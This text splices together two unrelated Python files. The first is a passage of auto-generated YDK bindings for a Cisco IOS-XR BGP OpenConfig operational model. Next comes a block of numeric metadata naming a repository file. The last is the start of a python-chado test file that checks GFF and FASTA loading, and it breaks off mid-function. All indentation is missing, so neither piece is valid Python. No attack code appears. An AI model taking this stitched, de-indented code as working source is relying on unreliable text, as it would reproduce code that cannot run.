def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-in-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib']['meta_info']
def clone_ptr(self):
self._top_entity = OcBgp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp']['meta_info']
| 65.4329
| 905
| 0.365426
| 48,345
| 740,635
| 5.328162
| 0.005357
| 0.007935
| 0.08036
| 0.030281
| 0.99229
| 0.991203
| 0.990528
| 0.989006
| 0.989006
| 0.988338
| 0
| 0.030157
| 0.545562
| 740,635
| 11,318
| 906
| 65.438682
| 0.735175
| 0.155398
| 0
| 0.853179
| 0
| 0.017213
| 0.113924
| 0.052692
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097408
| false
| 0
| 0.034427
| 0
| 0.200081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40c173b15c494cacb0c9093874e1c6443097f271
| 94,821
|
py
|
Python
|
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | null | null | null |
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | null | null | null |
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | 1
|
2021-05-02T14:49:57.000Z
|
2021-05-02T14:49:57.000Z
|
from nose.tools import raises
from . import ChadoTestCase, ci
class GFFTest(ChadoTestCase):
def _del_dbxref(self):
self.ci.session.query(self.ci.model.dbxref).filter(
self.ci.model.dbxref.db_id == 1,
(self.ci.model.dbxref.accession.like('VNBP%') | self.ci.model.dbxref.accession.like('%VIRU'))
).delete(synchronize_session='fetch')
def test_load_gff(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def test_load_gff_pepregex(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", re_protein_capture="PAC:([0-9]+)", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "foo18136219-bar", "gff>pep loaded correctly"
def test_load_gff_pepregex2(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
